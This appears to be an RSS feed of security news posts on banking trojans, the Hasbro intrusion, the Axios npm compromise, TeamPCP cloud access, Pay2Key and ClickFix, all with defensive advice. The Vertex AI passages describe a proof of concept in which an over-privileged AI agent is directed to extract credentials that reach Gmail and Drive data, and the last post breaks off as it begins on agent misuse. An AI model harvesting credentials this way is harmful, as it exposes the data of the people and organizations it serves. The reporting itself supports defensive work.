Once a foothold is established, the ultimate objective is the deployment of Casbaneiro. This trojan is engineered to activate when a user accesses financial services or cryptocurrency platforms, using screen overlays to capture keystrokes and credentials. It targets a wide array of institutions, including major regional providers like Santander and Banco do Brasil, as well as global platforms like Binance. Despite this sophistication in delivery, researchers note that the malware itself often struggles against modern endpoint protections. In environments with up-to-date security controls, Windows Defender and other EDR solutions frequently identify and block the AutoIT executables used by Water Saci before they can achieve their final objectives.

For defenders, these concurrent developments offer clear priorities. The Hasbro incident shows the necessity of moving beyond prevention-only mindsets. Security teams should prioritize testing their business continuity plans through real-world simulations to ensure that if systems must be taken offline, core revenue-generating operations can persist. This requires close coordination between IT, security, and logistics teams to identify which offline workarounds are actually viable under pressure.

From a detection standpoint, the Water Saci campaign indicates a need for more granular email monitoring. Because the Horabot script uses legitimate, internal, or trusted external accounts to propagate, defenders cannot rely solely on sender reputation. Organizations should consider implementing rules that flag or quarantine password-protected attachments from suspicious sources or those containing uncommon file types like AutoIT scripts. Furthermore, since these campaigns often use randomized filenames, behavioral analysis of the endpoint—monitoring for unauthorized attempts to access contact lists or automate mail sending—is more effective than searching for static hashes.
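The propagation pattern described above, a hijacked account suddenly mailing attachments to its entire contact list, lends itself to a simple volumetric check. The sketch below is a minimal illustration, assuming a normalized feed of (sender, time window, has-attachment) tuples; the event shape, function name, and threshold are our assumptions, not any vendor's schema.

```python
from collections import defaultdict

def flag_propagation(events, max_per_window=20):
    """Flag accounts that send an unusually large burst of messages with
    attachments inside a single time window -- the Horabot-style pattern
    of a hijacked account mailing its whole contact list at once.

    `events` is an iterable of (sender, window_id, has_attachment) tuples.
    The threshold is illustrative and should be tuned per environment.
    """
    counts = defaultdict(int)
    for sender, window, has_attachment in events:
        if has_attachment:
            counts[(sender, window)] += 1
    # Return a stable, sorted list of offending senders.
    return sorted({s for (s, _w), n in counts.items() if n > max_per_window})
```

Because the rule keys on behavior rather than sender reputation, it still fires when the burst originates from a trusted internal account.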

Looking forward, the persistence of banking trojans in the LATAM region suggests that while these threats are established, they remain profitable enough for malicious actors to continue refining their delivery methods. The shift toward self-propagation via Horabot indicates that unauthorized parties are increasingly aware of the trusted sender blind spot in many security architectures. At the same time, the Hasbro incident provides a blueprint for how large organizations can manage a network disruption without paralyzing their entire business model.

At this stage, the exact entry vector for the Hasbro incident remains undisclosed, and it is unclear if the unauthorized access resulted in any exposure of data. Similarly, while Casbaneiro is often blocked by modern endpoints, its continued use suggests it still finds success in environments with lagging update cycles or fragmented security stacks. We recommend that security teams remain vigilant for judicial-themed phishing and ensure that their endpoint protection rules are specifically tuned to catch the behavioral signatures of credential-harvesting overlays and automated propagation scripts.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Bank Trojan &apos;Casbaneiro&apos; Utilizes Self-Propagating Techniques Across Latin America</title>
        <link>https://security.shortwaves.live/blog/24ca3b6e-405f-423a-81c9-c218aad3a515</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/24ca3b6e-405f-423a-81c9-c218aad3a515</guid>
        <pubDate>Fri, 03 Apr 2026 03:05:20 GMT</pubDate>
        <description>A financially motivated threat group known as Water Saci is distributing the Casbaneiro banking trojan across Latin America and Spain. By utilizing self-propagating email scripts and social engineering, the campaign aims to capture credentials, though modern endpoint defenses remain highly effective at disrupting this activity.</description>
        <content:encoded><![CDATA[
Operations originating in Brazil continue to target banking credentials across Spanish-speaking regions using self-propagating and highly evasive delivery mechanisms.

While other regions are often associated with large-scale cryptocurrency incidents or specialized surveillance software, Brazil has developed a prominent ecosystem for banking malware. Threat actors in the region consistently develop financial trojans at a rapid pace, challenging security analysts to track their evolving methodologies.

The cybercrime operation tracked as Water Saci, or Augmented Marauder, has been central to this activity for several years. Recently, the group has divided its resources between two financially motivated campaigns. One campaign operates over [WhatsApp](https://www.darkreading.com/cyberattacks-data-breaches/self-propagating-malware-hits-whatsapp-users-brazil), focuses primarily on Brazil, and has been monitored by researchers since last year.

Security firm BlueVoyant has now identified a [parallel campaign](https://www.bluevoyant.com/blog/augmented-marauders-multi-pronged-casbaneiro-campaigns) operating via email, extending its reach through Latin America and Spain. This latest iteration of Water Saci's methodology features self-propagating capabilities, techniques to bypass email security controls, and mechanisms for financial data theft.

"This threat group seems as if they have a campaign that they try to launch [roughly] every quarter, and they keep changing it, so it's pretty clear whoever this is [is] very active [and] their end goal is to get access to users' bank accounts within the Latin American region," notes Thomas Elkins, SOC security analyst for BlueVoyant. "To me, it's clear that they're going to keep ramping up."

## A self-propagating banking campaign

At first glance, an Augmented Marauder campaign follows familiar social engineering patterns. Recipients receive a standardized email notification referencing a vague, pending judicial summons. Users who interact with the provided link are directed to a landing page that downloads a malicious ZIP file. However, each step in this sequence includes specific mechanisms designed to evade detection or aid propagation to new environments.

The file attached to the phishing email is password-protected, which adds a layer of superficial legitimacy and can obscure the contents from [secure email gateways (SEGs)](https://www.techtarget.com/searchsecurity/buyershandbook/What-secure-email-gateways-can-do-for-your-enterprise). Additionally, the ZIP file name is randomized for each recipient, creating an obstacle for signature-based detection tools.
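Because the ZIP format records an encryption flag in each entry's header, a gateway hook or triage script can detect a password-protected archive without knowing the password. The following is a minimal sketch using Python's standard `zipfile` module; the function names and the quarantine policy are illustrative assumptions, not a specific product's behavior.

```python
import io
import zipfile

def is_encrypted_zip(data: bytes) -> bool:
    """True if any entry in the archive sets the ZIP encryption flag
    (bit 0 of the general-purpose flags in the central directory)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(info.flag_bits & 0x1 for info in zf.infolist())
    except zipfile.BadZipFile:
        # Not a parseable ZIP; leave that verdict to other scanners.
        return False

def should_quarantine(filename: str, data: bytes) -> bool:
    """Quarantine password-protected ZIPs regardless of sender reputation,
    since campaigns like this one mail them from hijacked, trusted accounts."""
    return filename.lower().endswith(".zip") and is_encrypted_zip(data)
```

Since the check reads only header flags, it is cheap enough to run inline on every inbound attachment, and the randomized filenames that defeat signature matching have no effect on it.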

The most notable characteristic is the method used to distribute the judicial summons email. A script deployed later in the execution sequence, a tool identified as Horabot, is engineered to interact with the affected user's email account for self-propagation. It retrieves and filters the user's contacts, then distributes a new wave of [phishing emails](https://www.cybersecuritydive.com/news/phishing-it-leaders-ai-arctic-wolf/802976/) to these potential targets, attaching a modified version of the judicial summons file secured with a newly generated password.

This self-propagating element presents distinct challenges for defenders. Because new targets receive social engineering emails from recognized contacts, they may be more likely to open the attachments. This trusted sender relationship also reduces the likelihood of the emails being quarantined by standard email security solutions.

"And it's pretty smart because it makes it harder to identify where the attack actually originated from," Elkins points out. Between the self-propagating emails and the automated WhatsApp messages in their concurrent Brazilian campaign, "they're finding new ways to automate their attack chains to not just rely on an attacker-based account." This approach complicates the task of identifying infrastructure controlled by the threat actors.

## The limitations of banking trojans

The ultimate objective of this activity is the deployment of Casbaneiro, a traditional banking trojan that activates when affected users access online cryptocurrency or financial service providers. Its [target list](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojanspy.win32.casbaneiro.rg) is extensive, encompassing major institutions in Central and South America, such as Santander and Banco do Brasil, as well as payment and cryptocurrency platforms like Binance. Following established patterns, the malware uses screen overlays to simulate legitimate login portals, capturing keystrokes and credential data.

For Elkins, the continued reliance on [Brazilian banking trojans](https://www.darkreading.com/threat-intelligence/whatsapp-eternidade-trojan-self-propagates-brazil) is notable. "It's interesting that they're still hung up on banking Trojans, because a lot of time these newer threat actors are focusing on: How do we gain access to this customer's network? How do we start exfiltrating data? How can we use ransomware to get paid?" he observes.

While banking trojans represent a direct method for financial theft, modern endpoint protections are increasingly effective at mitigating them. "I don't think most of the banking Trojans succeed at this point, in today's environment, because they're so easy to attack now," Elkins says.

Organizations with standard, up-to-date cybersecurity controls are well-positioned to defend against these campaigns. "They're getting caught more easily. I mean, Windows Defender itself has so many different rule sets for catching AutoIT executables [like those used by Water Saci] and stopping that behavior," he notes. "That's why, a lot of the time in my research, we don't see it get all the way to the end in the customer's environment. It's usually stopped at the email stage."

## About the author

Nate Nelson is a journalist and scriptwriter. He writes for "Darknet Diaries," the most popular podcast in cybersecurity, and co-created the former Top 20 tech podcast "Malicious Life." Before joining Dark Reading, he was a reporter at Threatpost.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Hasbro unauthorized access incident: Remediation and business continuity efforts</title>
        <link>https://security.shortwaves.live/blog/05282268-447a-4d14-9b63-b4d0db144a5c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/05282268-447a-4d14-9b63-b4d0db144a5c</guid>
        <pubDate>Fri, 03 Apr 2026 03:05:19 GMT</pubDate>
        <description>Hasbro recently disclosed an unauthorized network access incident but successfully maintained key operations through proactive business continuity planning. This event illustrates the measurable value of established incident response strategies in minimizing supply chain and production disruptions.</description>
        <content:encoded><![CDATA[
            The household toys and games manufacturer Hasbro experienced a recent security incident. However, the company indicated it will continue taking orders and shipping products, though some delays may occur during remediation efforts.

In an 8-K filing with the Securities and Exchange Commission (SEC), Hasbro disclosed that on March 28 it discovered "unauthorized access" within its network. The details provided point to both immediate operational challenges and proactive resilience measures.

On the positive front, the company demonstrated preparedness for such scenarios. Unlike organizations that must fully shut down operations during major incidents, Hasbro "has implemented and continues to implement business continuity plans to enable it to continue to take orders, ship product, and conduct other key operations while it resolves this situation."

To contain the issue, Hasbro had to take certain systems offline. The company noted that these interim business continuity measures "may continue for several weeks before the situation is fully resolved and may result in some delays."

Benny Lakunishok, CEO and co-founder of Zero Networks, speculates that the incident might involve ransomware—alluding to it with the phrase "handsome mare"—and observes that the wording in Hasbro's filing warrants attention. "The fact that they said unauthorized access, and the fact that they are saying full recovery could take several weeks — those are red flags," Lakunishok adds.

## Retail sector risks

"[Retail] remains a high-value target because it combines sensitive customer data with operational complexity," says Kevin Marriott, director of cyber content strategy and IP at Immersive. "Companies like Hasbro sit across global supply chains, ecommerce platforms, and third-party ecosystems, creating a wide and often fragmented attack surface," making them frequent targets for opportunistic, financially motivated, and supply-chain-focused threat actors.

Lakunishok adds that, similar to other manufacturing entities, Hasbro prioritizes keeping production and fulfillment lines operational. "That's priority number one: they have a lot of orders, so there's a lot at stake if there's any ransomware or [disruption] of a fulfillment line. That's a lot of money [on the line], so if it's about paying $10 million, that's something they might do."

Hasbro has not specified the exact nature of the unauthorized access. The company has not yet responded to Dark Reading's request for additional details.

## Maintaining production continuity

Security incidents can severely disrupt operations, sometimes forcing production lines to halt entirely. Last year, Jaguar Land Rover experienced a ransomware incident that caused weeks of shutdowns, leading to hundreds of millions of dollars in losses for the company and affecting the broader UK economy.

In the retail sector, Marriott notes it is rare for organizations to maintain normal operations during an active security event. "There is often a significant level of disruption across logistics, customer services, payments or internal system access," he adds.

Marriott emphasizes the importance of focusing on both prevention and incident response planning. "It's about ensuring teams across an organization are prepared to both recognise and respond when something inevitably gets through. Businesses that regularly test their people through real-world simulations build the muscle memory needed to identify these tactics early and contain threats quickly."

Despite the limited details, Marriott commends Hasbro for keeping production running. "What we have seen so far from Hasbro's incident response suggests that they have effective planning and the right controls in place, which have so far enabled them to navigate a cyber incident without it escalating into a full-scale operational crisis," he observes. "This doesn't happen by accident. It's the result of organizations that have gone beyond static plans and have actively tested how they would respond under pressure."
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Threat Intelligence Update: Axios NPM Compromise, TeamPCP Cloud Operations, and Emerging MaaS Threats</title>
        <link>https://security.shortwaves.live/blog/142eba32-4cd8-4b07-9231-cf63f796a172</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/142eba32-4cd8-4b07-9231-cf63f796a172</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:53 GMT</pubDate>
        <description>This update covers recent shifts in the threat situation, including an unsafe dependency discovered in the Axios NPM package, rapid cloud enumeration by TeamPCP, and permission risks in AI agents. We detail the technical mechanics of these operations and provide actionable remediation steps to help security teams harden their environments.</description>
        <content:encoded><![CDATA[
            The current security environment is defined by a tightening loop between initial exposure and deep infrastructure compromise, driven by sophisticated supply chain methodologies and scaled social engineering. The most significant development in the past 24 hours involves a high-precision compromise of Axios, the widely used JavaScript HTTP client library. With over 400 million monthly downloads, Axios represents a critical node in the global software supply chain. Security researchers identified unauthorized versions, `axios@1.14.1` and `axios@0.30.4`, published following the compromise of a maintainer’s account. These versions introduced an unsafe dependency, `plain-crypto-js@4.2.1`, which installs a remote access trojan (RAT) across Windows and macOS systems. While registry maintainers removed the packages within hours, the incident indicates a shift in methodology: threat actors are actively staging infrastructure for long-term access brokering rather than immediate financial returns.

### Cloud enumeration and TeamPCP operations

This supply chain pressure extends directly into cloud and SaaS environments. Security teams are currently tracking a group known as TeamPCP, which has rapidly operationalized secrets exposed during recent compromises of open-source tools like the Trivy scanner and LiteLLM library. TeamPCP demonstrates high operational speed, often initiating environment discovery within 24 hours of credential exposure. The group uses validated AWS access keys and Azure secrets to perform extensive enumeration, mapping out S3 buckets and Elastic Container Service (ECS) instances. In several cases, they have utilized the ECS Exec feature to run unauthorized scripts directly on production containers, circumventing traditional perimeter controls by repurposing the organization’s own administrative tools.
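Activity like this tends to surface in CloudTrail as a burst of List/Describe calls followed by ECS `ExecuteCommand` events. A minimal triage sketch over exported CloudTrail records might look like the following; the `eventName` and `eventSource` values match CloudTrail's documented fields for ECS Exec, but the threshold, alert labels, and helper name are our assumptions.

```python
def flag_cloud_enumeration(events, enum_threshold=50):
    """Scan CloudTrail-style event records for two TeamPCP-like signals:
    any use of ECS Exec, and a high volume of List*/Describe*/Get* calls
    issued under a single access key (enumeration bursts)."""
    alerts = []
    read_calls_per_key = {}
    for ev in events:
        name = ev.get("eventName", "")
        key = ev.get("userIdentity", {}).get("accessKeyId", "unknown")
        # ECS Exec shows up as ExecuteCommand against the ECS service.
        if name == "ExecuteCommand" and ev.get("eventSource") == "ecs.amazonaws.com":
            alerts.append(("ecs-exec", key))
        if name.startswith(("List", "Describe", "Get")):
            read_calls_per_key[key] = read_calls_per_key.get(key, 0) + 1
    for key, count in read_calls_per_key.items():
        if count >= enum_threshold:
            alerts.append(("enumeration-burst", key))
    return alerts
```

In practice this logic belongs in a SIEM rule with per-principal baselines rather than a fixed threshold, but the two signals, administrative-feature use plus a discovery burst, are the core of the detection.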

### Regional trends and workforce constraints

The regional security environment in Latin America (LATAM) mirrors this intensity while facing specific structural challenges. Organizations in the region currently record nearly 40% more security incidents than the global average. Government agencies manage roughly 4,200 incidents per week, nearly double the global cross-industry average. This volume is driven by factors including the wide adoption of payment systems like Brazil’s Pix, which has led to a mature ecosystem of banking Trojans, alongside the persistence of legacy government infrastructure. At the same time, recent workforce data shows the region’s defensive capacity is restricted by rigid hiring practices. The industry faces a shortfall of 350,000 cybersecurity professionals, yet 70% of the existing LATAM workforce is self-taught, frequently lacking the formal university degrees that corporate job descriptions still mandate.

### Venom Stealer and Vertex AI permission risks

Simultaneously, the technical barriers to entry for sophisticated operations are falling due to malware-as-a-service (MaaS) platforms like Venom Stealer. This platform automates "ClickFix" social engineering campaigns, which deceive users into manually executing commands under the guise of fixing a CAPTCHA or installing a font update. Because the user initiates the execution, these techniques frequently bypass security logic designed to monitor for suspicious parent-child process relationships. Venom Stealer presents an elevated risk because it establishes a persistent exfiltration pipeline rather than performing a single credential harvesting event. It continuously monitors browser login files for new data and includes a GPU-powered engine designed to crack cryptocurrency wallet seeds found on the local filesystem. This automation enables lower-tier actors to conduct multi-stage data theft for a $250 monthly subscription.

As organizations integrate technologies like AI agents, they inherit specific permission-related risks. Security research into Google Cloud’s Vertex AI platform recently found that default configurations often grant AI agents excessive permissions through the Per-Project, Per-Product Service Agent (P4SA). In a proof-of-concept, researchers showed that an agent could be directed to extract credentials providing access to both the specific project and broader Google Workspace data, including Gmail and Drive. This over-privilege issue can transform autonomous agents into potential insider risks if teams do not strictly govern their underlying service accounts.

### Recommended defensive actions

To protect environments, the immediate priority is a thorough audit of the JavaScript build pipeline. We recommend organizations verify they have not pulled the unauthorized Axios versions. Any recent use of `axios@1.14.1` or `axios@0.30.4` should be treated as a full-system exposure, requiring complete credential rotation and forensic analysis. To counter the operational speed of groups like TeamPCP, security teams should implement active monitoring for anomalous enumeration. Specifically, monitor closely for high volumes of `git.clone` events or the unexpected use of administrative features like ECS Exec.
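One way to start that audit is a direct scan of each repository's lockfile. The sketch below walks the `packages` map of an npm v2/v3 `package-lock.json` and reports any pinned copy of the compromised versions; the helper name is ours, and a real audit should also cover yarn/pnpm lockfiles, vendored copies, and container images.

```python
import json

# Known-bad (name, version) pairs from the incident described above.
COMPROMISED = {("axios", "1.14.1"), ("axios", "0.30.4")}

def scan_lockfile(lock_text: str):
    """Report (path, version) for every installed package in an npm v2/v3
    package-lock.json that matches a known-compromised release."""
    lock = json.loads(lock_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/axios" (possibly nested); the empty
        # key is the root project itself.
        name = path.rsplit("node_modules/", 1)[-1] if path else lock.get("name", "")
        if (name, meta.get("version")) in COMPROMISED:
            hits.append((path, meta.get("version")))
    return hits
```

Any hit warrants treating the host that ran `npm install` as exposed, with full credential rotation as described above.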

Mitigating the risk of "ClickFix" techniques and platforms like Venom Stealer requires adjustments to endpoint hardening. We recommend using Group Policy to restrict PowerShell execution for standard users and disabling the "Run" dialog where possible. Additionally, training programs should help employees recognize the specific mechanics of these campaigns: any web prompt asking a user to copy and paste a command into a terminal should be treated as a high-severity indicator of compromise. In cloud environments, transitioning default AI agent permissions to a "Bring Your Own Service Account" (BYOSA) model is necessary to enforce the principle of least privilege.
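A complementary detection idea, hypothetical and deliberately narrow, is to pattern-match text a user is about to paste into a terminal against common ClickFix command shapes. The three patterns below cover only well-known lure styles (encoded PowerShell, `mshta` fetching a remote URL, and curl-pipe-to-shell); a production rule set would be far broader and tuned against false positives.

```python
import re

# Illustrative ClickFix command shapes; not an exhaustive rule set.
CLICKFIX_PATTERNS = [
    re.compile(r"powershell(\.exe)?\s+.*-enc", re.I),   # encoded one-liner
    re.compile(r"mshta\s+https?://", re.I),             # remote HTA payload
    re.compile(r"curl\s+[^|]+\|\s*(sh|bash|iex)", re.I),  # pipe to shell
]

def looks_like_clickfix(pasted_text: str) -> bool:
    """True if text about to be pasted into a terminal matches a known
    ClickFix command shape and should be blocked or flagged for review."""
    return any(p.search(pasted_text) for p in CLICKFIX_PATTERNS)
```

Hooking such a check into a clipboard-monitoring EDR capability would be platform-specific; the value here is the heuristic itself, which keys on the one action every ClickFix lure requires the user to perform.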

### State-aligned operations and attribution

The distinction between financially motivated cybercrime and state-aligned sabotage continues to blur. Iranian state-backed groups, such as Pay2Key, increasingly adopt "pseudo-ransomware" tactics. These operations use encryption to mimic standard extortion, but the primary goal is often data destruction or political retribution. By outsourcing these operations to Russian threat actor forums through high-percentage profit-sharing models, state actors achieve a level of deniability that complicates both attribution and legal compliance for affected organizations.

While registry maintainers contained the Axios compromise relatively quickly, the full scope of the downstream impact remains unknown. The sophistication of the tradecraft (staged dependencies, multi-platform executables, and self-deleting anti-forensic measures) suggests that UNC1069, the North Korean group suspected of the operation, is refining a blueprint for future supply chain compromises. We advise security teams to maintain strict monitoring, as credentials harvested during these brief exposure windows often fuel secondary access phases weeks or months later.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Tracking the Resurgence of Pay2Key and Pseudo-Ransomware Operations</title>
        <link>https://security.shortwaves.live/blog/d84434fa-f7da-427c-b537-83384c820a19</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/d84434fa-f7da-427c-b537-83384c820a19</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:53 GMT</pubDate>
        <description>An analysis of recent intelligence detailing how state-aligned actors are leveraging pseudo-ransomware and financially motivated threat actors to obscure destructive operations. We review these evolving tactics and provide actionable guidance to help organizations protect their infrastructure and navigate associated compliance risks.</description>
        <content:encoded><![CDATA[
            State-aligned actors in Iran are establishing partnerships with participants on Russian threat actor forums, blurring the boundaries between state-directed and financially motivated cyber operations. This operational shift supports their broader geopolitical objectives in the ongoing conflict involving the US and Israel.

As part of these developments, an Iranian state-backed operation known as Pay2Key has resurfaced. According to a recent report from KELA's Cyber Intelligence Center, the group is actively recruiting affiliates to target high-impact entities in the US. The methodology involves deploying "pseudo-ransomware" and operating as an initial access broker (IAB) for other ransomware groups to drive both disruption and financial gain.

KELA researchers note that pseudo-ransomware relies on encryption but serves primarily as a destructive tool, functioning similarly to wiper malware rather than a mechanism for standard financial extortion.

These shifts reflect a broader strategy to adopt established cybercrime methodologies following the joint US-Israel military action on February 28. KELA's analysis indicates that these operations create significant business disruption while introducing complex attribution challenges, leading to elevated legal and operational risks for affected organizations.

When an organization experiences a ransomware or extortion event, determining the identity of the threat actor becomes a critical compliance requirement. If ransom payments are inadvertently routed to state-linked entities, such as those sanctioned by the US Treasury’s Office of Foreign Assets Control (OFAC), organizations face the risk of severe financial and legal penalties.

## Evaluating historical and current methodologies

The recent increase in Pay2Key activity parallels events from last July, following a conflict where the US and Israel targeted Iranian nuclear facilities. During that period, Pay2Key operations resumed with a focus on Western organizations, offering increased financial incentives for operations aligning with Iran’s geopolitical goals.

Currently, operators are utilizing a similar profit-sharing model. Pay2Key affiliates recruited online receive an increased share, from 70% up to 80%, when they successfully gain unauthorized access to networks belonging to designated geopolitical adversaries, primarily within the US and Israel. KELA describes this incentive structure as a method of outsourcing geopolitical operations to a broader pool of threat actors, acting as a scalable force multiplier for state-aligned activities.

Simultaneously, state-aligned groups are deploying destructive tools under the guise of financial extortion. By using ransomware-style encryption, these actors obscure data destruction, sabotage, or political retribution. For example, the Iran-backed group APT Agrius uses the Apostle malware, which researchers observed was retrofitted from its original data wiper format into a ransomware variant. Applying financial extortion frameworks over destructive wipers allows these actors to obscure their primary motives and complicates incident response efforts.

## Adapting defenses for hybrid threats

The deliberate blending of state-sponsored operations and opportunistic financial extortion means that defenders must simultaneously manage operational, financial, and geopolitical risks. Navigating this environment requires organizations to implement foundational resilience measures alongside proactive controls.

To protect organizational infrastructure against these evolving tactics, we recommend the following defensive actions:

* Apply security patches and continuously monitor internet-facing edge devices for unauthorized access.

* Deploy phishing-resistant multi-factor authentication (MFA) across the environment.

* Maintain secure, offline backups and regularly test incident response readiness.

Additionally, we advise organizations to properly segment IT and operational technology (OT) systems while hardening access controls. This structural separation reduces the risk of lateral movement by state-backed threat actors. Maintaining continuous threat intelligence monitoring will also improve an organization's visibility into adversary infrastructure and the compromised credential market, enabling faster identification of potential risks.

*Context Note: The original reporting for this intelligence was provided by Elizabeth Montalbano, a contributing writer with over 25 years of professional experience covering technology, business, and culture.*
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>TeamPCP expands unauthorized access to cloud and SaaS environments using compromised credentials</title>
        <link>https://security.shortwaves.live/blog/fc07bff1-e7d4-4dd3-85aa-1cdce0174039</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/fc07bff1-e7d4-4dd3-85aa-1cdce0174039</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:52 GMT</pubDate>
        <description>Recent supply chain incidents involving popular open source tools have led to unauthorized access across cloud and SaaS platforms. Security teams must rapidly rotate exposed credentials and monitor for anomalous enumeration activity to protect their environments.</description>
        <content:encoded><![CDATA[
            TeamPCP is leveraging compromised credentials obtained during recent supply chain incidents to gain unauthorized access to cloud and software-as-a-service (SaaS) environments.

This month, unauthorized modifications affected several open source software projects, beginning with the Aqua Security-maintained Trivy scanner and Checkmarx's KICS static code analysis tool. The threat actors subsequently compromised LiteLLM, an open source Python library, and the PyPI package of Telnyx, which developers use for voice AI agents.

Across all four campaigns, the objective remained consistent: utilize modified open source software to deploy credential-harvesting utilities within organizations. These tools are designed to collect user credentials, API keys, SSH keys, and other sensitive secrets.

TeamPCP has since escalated its operations, using these compromised credentials to gain unauthorized access to AWS and Azure environments, as well as various SaaS instances. This progression shows why rapid response protocols are necessary following supply chain exposures. Organizations that delay rotating and revoking exposed credentials face an elevated risk of unauthorized access.

## TeamPCP expands cloud access operations

In a recent security bulletin, Wiz Research detailed how its customer incident response team (CIRT) investigated and addressed multiple incidents linked to TeamPCP following the initial supply chain compromises.

The Wiz CIRT first detected the unauthorized use of credentials on March 19, observing threat actors utilizing the Trufflehog open source tool to validate the exposed secrets. The team noted validation activity targeting AWS access keys, Azure application secrets, and various SaaS tokens.

Within the affected AWS environments, the Wiz CIRT observed that the threat actors rapidly utilized the compromised secrets. Researchers noted that discovery operations began as quickly as 24 hours after the initial credential exposure.

TeamPCP conducted extensive enumeration in affected AWS environments, gathering data on identity and access management roles and S3 buckets, while specifically mapping Amazon Elastic Container Service (ECS) instances.
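Hunting for this kind of burst enumeration is one practical response. The sketch below flags identities issuing an unusually high number of read-only discovery calls within a short window in CloudTrail-style logs. The event shape, call prefixes, and thresholds are illustrative assumptions, not Wiz's detection logic:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Read-only discovery calls commonly seen during cloud enumeration.
DISCOVERY_PREFIXES = ("List", "Describe", "GetBucket", "GetRole")

def flag_enumeration(events, threshold=20, window=timedelta(minutes=10)):
    """Flag identities whose discovery-call volume exceeds `threshold`
    within any `window`. `events` are dicts with 'identity', 'eventName',
    and 'eventTime' (ISO 8601) keys -- a simplified CloudTrail shape."""
    per_identity = defaultdict(list)
    for e in events:
        if e["eventName"].startswith(DISCOVERY_PREFIXES):
            per_identity[e["identity"]].append(
                datetime.fromisoformat(e["eventTime"]))
    flagged = set()
    for identity, times in per_identity.items():
        times.sort()
        for i, start in enumerate(times):
            # Count discovery calls inside the sliding window at `start`.
            in_window = sum(1 for t in times[i:] if t - start <= window)
            if in_window >= threshold:
                flagged.add(identity)
                break
    return flagged
```

In practice, the thresholds would need tuning against a baseline of legitimate automation, since backup jobs and inventory tools also issue bursts of List and Describe calls.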

Following enumeration, the unauthorized parties extracted data from S3 buckets and AWS Secrets Manager. They also utilized the ECS Exec feature to execute Bash commands and Python scripts on running containers. According to Wiz researchers, this access allowed the threat actors to further map the environment and access additional sensitive data.

Wiz Research indicated to Dark Reading that while they do not provide specific figures on the number of impacted environments, the activity spans multiple cloud platforms. "What we can share is that our research shows this activity isn't limited to a single cloud," Wiz Research noted. "We've observed compromises across Azure, GitHub, and other SaaS providers, reflecting how threat actors reuse validated credentials across environments."

## The importance of rapid response

Beyond AWS environments, the Wiz CIRT documented unauthorized activity in GitHub, where TeamPCP utilized the platform's workflows to execute code in targeted repositories. The researchers noted that the threat actors also used compromised GitHub Personal Access Tokens to clone repositories at scale.

These escalating operations indicate that TeamPCP prioritizes speed over stealth. The campaigns demonstrate the necessity for swift incident response when credentials are exposed. Wiz Research stated that organizations taking immediate action to revoke or rotate access successfully limited their overall exposure.

We recommend that any organization potentially impacted by the supply chain compromises affecting Trivy, KICS, LiteLLM, or Telnyx immediately rotate all related secrets and credentials. Because threat actors may have established access to cloud instances prior to credential rotation, security teams should methodically hunt for anomalous activity within their environments.

Key indicators of suspicious activity include the unusual use of VPNs, a high volume of "git.clone" events within a short timeframe, and unexpected enumeration processes. Wiz has published specific indicators of compromise (IOCs) for the TeamPCP campaigns, and we advise security teams to monitor for these patterns while ensuring comprehensive audit logging is enabled across their infrastructure.
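To make the "high volume of git.clone events" indicator concrete, the sketch below flags actors whose clone activity spikes within a single five-minute bucket. The tuple-based event shape and the threshold are hypothetical simplifications of an audit-log export, not a vendor-specified detection:

```python
from collections import defaultdict
from datetime import datetime

def clone_burst_actors(events, threshold=15):
    """Flag actors with `threshold` or more 'git.clone' events in any
    single five-minute bucket. `events` are (actor, action, iso_timestamp)
    tuples -- a simplified stand-in for audit-log entries."""
    buckets = defaultdict(int)
    for actor, action, ts in events:
        if action != "git.clone":
            continue
        t = datetime.fromisoformat(ts)
        # Truncate the timestamp to the start of its five-minute bucket.
        bucket = (actor, t.replace(minute=t.minute - t.minute % 5,
                                   second=0, microsecond=0))
        buckets[bucket] += 1
    return {actor for (actor, _), n in buckets.items() if n >= threshold}
```

A compromised Personal Access Token cloning repositories at scale, as described above, produces exactly this signature: many clones from one identity compressed into a short interval.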
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Securing AI agents: Addressing default permission risks in Google Cloud Vertex AI</title>
        <link>https://security.shortwaves.live/blog/fdc13099-4baf-4fb4-894d-35c8b63b126c</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/fdc13099-4baf-4fb4-894d-35c8b63b126c</guid>
        <pubDate>Thu, 02 Apr 2026 03:27:52 GMT</pubDate>
        <description>Security research into Google Cloud’s Vertex AI platform reveals how excessive default permissions in deployed AI agents can lead to unauthorized access to sensitive data and infrastructure. Implementing a &quot;Bring Your Own Service Account&quot; (BYOSA) model allows organizations to enforce least-privilege access and safely integrate agentic AI into their environments.</description>
        <content:encoded><![CDATA[
            As organizations increasingly deploy AI agents to automate complex operational workflows, ensuring these systems are configured with appropriate permissions is a critical defensive measure. Recent security research by Palo Alto Networks details how this risk can materialize within Google Cloud's Vertex AI platform. Their analysis demonstrates that broad default permissions could enable an unauthorized party to misuse a deployed AI agent, potentially leading to unauthorized access to sensitive data and restricted internal infrastructure.

## The risk of excessive default permissions

Vertex AI is a Google Cloud platform offering an Agent Engine and Application Development Kit. Developers use these tools to build autonomous agents that interact with APIs, manage files, query databases, and execute decisions with minimal human oversight. Because these agents automate significant enterprise workflows (analyzing data, powering customer service tools, and integrating with existing cloud services), they often require broad access to cloud environments.

